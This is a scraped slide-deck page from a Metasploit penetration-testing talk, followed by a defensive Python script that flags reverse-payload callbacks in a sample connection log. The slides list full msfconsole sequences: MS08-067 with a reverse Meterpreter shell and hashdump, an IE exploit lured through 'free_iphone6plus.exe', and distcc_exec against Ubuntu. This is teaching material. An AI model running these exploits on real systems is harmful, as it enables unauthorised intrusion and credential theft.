AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing SuiteAI Pilot Review: The World’s First Virtual Assistant Marketing Suite
AI Pilot Review: The World’s First Virtual Assistant Marketing Suite
 
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...
 
Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"Navigating the Metaverse: A Journey into Virtual Evolution"
Navigating the Metaverse: A Journey into Virtual Evolution"
 
RISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent EnterpriseRISE with SAP and Journey to the Intelligent Enterprise
RISE with SAP and Journey to the Intelligent Enterprise
 
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdfDominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
Dominate Social Media with TubeTrivia AI’s Addictive Quiz Videos.pdf
 
Paketo Buildpacks : la meilleure façon de construire des images OCI? DevopsDa...

Pen-Testing with Metasploit

  • 1. Pen-Testing With Metasploit
    By - Mohammed Danish Amber
  • 2. AGENDA
    ▪ Why & What's Pen-Testing
    ▪ About Metasploit
    ▪ Metasploit Basics & Meterpreter
    ▪ Demo
  • 3. Mohammed Danish Amber
    ▪ Geek & Security Analyst
    ▪ Information Security Enthusiast
    ▪ Working in TCS
    ▪ Lecturer & Engineer
    ▪ Collaborative Project - Hacker Ecosystem
    ▪ Make the Internet a Secure Place
  • 4. Why Pen-Testing
    ▪ Millions of dollars have been invested in security programs to protect critical infrastructure and prevent data breaches
    ▪ A penetration test is one of the most effective ways to identify weaknesses and deficiencies in these programs
  • 5. What's Pen-Testing
    ▪ A method to evaluate the security of a computer system / network
    ▪ Practice (attacking) an IT system like a 'hacker' does
      – Find security holes (weaknesses)
      – Bypass security mechanisms
      – Compromise an organization's IT system security
    MUST HAVE PERMISSION FROM THE IT SYSTEM OWNER
    ILLEGAL ACTIVITY CAN PUT YOU IN JAIL!
  • 6. ETHICS
    ▪ THINK BEFORE YOU ACT
    ▪ DON'T BE STUPID
    ▪ DON'T BE MALICIOUS
  • 7. PEN-TESTING PHASES
    ▪ INFORMATION GATHERING
    ▪ VULNERABILITY ANALYSIS
    ▪ EXPLOITATION
    ▪ POST EXPLOITATION
    ▪ REPORTING
  • 9. Metasploit
    ▪ Not just a tool but an entire framework
    ▪ An open source platform for writing security tools and exploits
    ▪ Easily build attack vectors by combining its exploits, payloads and encoders
    ▪ Create and execute more advanced attacks
    ▪ Ruby based
  • 10. Metasploit Interfaces
    ▪ MSFconsole
    ▪ msfweb, msfgui (discontinued)
    ▪ Metasploit Pro & Community Edition
    ▪ Armitage
  • 13. Metasploit Terminology
    ▪ Exploit: Code that allows a pentester to take advantage of a flaw within a system, application, or service
    ▪ Payload: Code that we want the target system to execute (a few commands to be executed on the target system)
    ▪ Shellcode: A set of instructions used as the payload when exploitation occurs
    ▪ Module: A piece of software that can be used by Metasploit
    ▪ Listener: A component waiting for an incoming connection
  • 14. How does Exploitation work
    ▪ Attacker sends: Exploit + Payload
    ▪ Upload + download DATA
    ▪ Vulnerable Server: Exploit runs + Payload runs
  • 15. Meterpreter
    ▪ Used as the payload after a vulnerability is exploited
    ▪ Improves post-exploitation
  • 16. Meterpreter
    ▪ Exploiting a vulnerability
    ▪ Select Meterpreter as the payload
    ▪ Meterpreter shell
  • 22. Windows XP Exploitation
    ▪ msf > search windows/smb
    ▪ msf > info exploit/windows/smb/ms08_067_netapi
    ▪ msf > use exploit/windows/smb/ms08_067_netapi
    ▪ msf exploit(ms08_067_netapi) > show payloads
    ▪ msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
    ▪ msf exploit(ms08_067_netapi) > show options
    ▪ msf exploit(ms08_067_netapi) > set RHOST <remote ip>
    ▪ msf exploit(ms08_067_netapi) > set LHOST <attacker ip>
    ▪ msf exploit(ms08_067_netapi) > show options
    ▪ msf exploit(ms08_067_netapi) > exploit
    ▪ meterpreter > background
    ▪ sessions -l
  • 23. Windows XP Exploitation
    ▪ sessions -i 1
    ▪ meterpreter > getsystem -h
    ▪ getuid
    ▪ hashdump
  • 24. Windows 7 Exploitation
    ▪ msf > use exploit/windows/browser/ms11_003_ie_css_import
    ▪ msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
    ▪ msf exploit(ms11_003_ie_css_import) > show options
    ▪ msf exploit(ms11_003_ie_css_import) > set SRVHOST <attacker ip>
    ▪ msf exploit(ms11_003_ie_css_import) > set SRVPORT 80
    ▪ msf exploit(ms11_003_ie_css_import) > set URIPATH free_iphone6plus.exe
    ▪ msf exploit(ms11_003_ie_css_import) > set LHOST <attacker ip>
    ▪ msf exploit(ms11_003_ie_css_import) > set LPORT 443
    ▪ msf exploit(ms11_003_ie_css_import) > exploit
    Just wait until the victim opens the URL http://<ip>:80/free_iphone6plus.exe
  • 25. Windows 7 Exploitation
    ▪ msf exploit(ms11_003_ie_css_import) > sessions -l
    ▪ msf exploit(ms11_003_ie_css_import) > sessions -i 1
    ▪ meterpreter > sysinfo
    ▪ meterpreter > shell
  • 26. Ubuntu Exploitation
    ▪ search distcc
    ▪ use exploit/unix/misc/distcc_exec
    ▪ show payloads
    ▪ set PAYLOAD cmd/unix/reverse
    ▪ show options
    ▪ set rhost <victim ip>
    ▪ set lhost <attacker ip>
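Slide 14 describes the exchange (the attacker sends exploit + payload to the vulnerable server; the payload then runs and connects back to the attacker's listener), and the Windows XP and Ubuntu walkthroughs both use reverse payloads against a network service (SMB and distcc). From the defender's side, that exchange has a recognisable shape in connection logs: an inbound connection to a service port, followed within seconds by an outbound connection from the same host back to the same remote address. The script below is an added example written for this page, not code from the slide deck or from Metasploit; it correlates those two events over a constructed sample log. The log format, the addresses and the service-port table (SMB on 445, distcc on its default 3632) are assumptions made for the demo.

```python
"""Correlating an inbound exploit connection with its reverse-payload callback.

Added example, not part of the original slide deck. The log format, the
addresses and the service-port table are constructed for this demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Service ports matching the deck's walkthroughs: SMB for the Windows XP slides,
# distcc for the Ubuntu slide (assumed default ports, adjust for your network).
MONITORED_SERVICE_PORTS = {445: "smb", 3632: "distcc"}

# A callback is suspicious only if it follows the inbound hit closely.
CALLBACK_WINDOW = timedelta(seconds=30)

# Constructed sample log: "<timestamp> <IN|OUT> <src ip:port> <dst ip:port>",
# IN = connection into the monitored host, OUT = connection leaving it.
SAMPLE_LOG = """\
2024-06-04T10:00:01 IN 198.51.100.7:49152 10.0.0.5:445
2024-06-04T10:00:03 OUT 10.0.0.5:1042 198.51.100.7:4444
2024-06-04T10:05:00 IN 10.0.0.9:50000 10.0.0.5:445
2024-06-04T10:30:00 IN 198.51.100.7:41000 10.0.0.8:3632
2024-06-04T10:30:02 OUT 10.0.0.8:33000 198.51.100.7:443
2024-06-04T11:00:00 OUT 10.0.0.5:1050 203.0.113.20:443
"""


def parse_line(line):
    """Split one constructed log line into a dict of typed fields."""
    ts, direction, src, dst = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {
        "ts": datetime.fromisoformat(ts),
        "dir": direction,
        "src_ip": src_ip,
        "src_port": int(src_port),
        "dst_ip": dst_ip,
        "dst_port": int(dst_port),
    }


def find_callbacks(log_text, window=CALLBACK_WINDOW):
    """Return one alert per outbound connection that looks like a reverse
    payload calling back to the address that just hit a monitored service."""
    events = sorted(
        (parse_line(l) for l in log_text.splitlines() if l.strip()),
        key=lambda e: e["ts"],
    )
    # Inbound hits on monitored ports, keyed by (internal host, remote address).
    inbound = defaultdict(list)
    alerts = []
    for e in events:
        if e["dir"] == "IN" and e["dst_port"] in MONITORED_SERVICE_PORTS:
            inbound[(e["dst_ip"], e["src_ip"])].append(e)
        elif e["dir"] == "OUT":
            # Is this host now connecting back to the address that hit it?
            for hit in inbound.get((e["src_ip"], e["dst_ip"]), []):
                delay = e["ts"] - hit["ts"]
                if timedelta(0) <= delay <= window:
                    alerts.append({
                        "victim": e["src_ip"],
                        "remote": e["dst_ip"],
                        "service": MONITORED_SERVICE_PORTS[hit["dst_port"]],
                        "callback_port": e["dst_port"],
                        "delay_s": delay.total_seconds(),
                    })
                    break
    return alerts


if __name__ == "__main__":
    for a in find_callbacks(SAMPLE_LOG):
        print(f"{a['victim']} hit on {a['service']} by {a['remote']}, "
              f"called back on port {a['callback_port']} after {a['delay_s']:.0f}s")
```

On the sample log this raises two alerts (the SMB hit followed by a callback on 4444, and the distcc hit followed by a callback on 443) and stays quiet on the internal SMB connection and the unrelated outbound HTTPS session. The callback port alone is a weak signal, since the Windows 7 walkthrough deliberately uses LPORT 443 to blend in with web traffic; pairing the outbound connection with the inbound hit that preceded it is what makes the rule useful. Note that this shape does not cover the browser-exploit case on slide 24, where the first contact is itself outbound from the victim to the attacker's web server.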
  • 28. Thanks To
    ▪ Kali / BackTrack Linux
    ▪ Metasploit Team (HD Moore & Rapid7)
    ▪ Offensive Security / Metasploit Unleashed
    ▪ David Kennedy
    ▪ Georgia Weidman
    ▪ Null Hyderabad Chapter - CORE TEAM
    ▪ #nullhyd @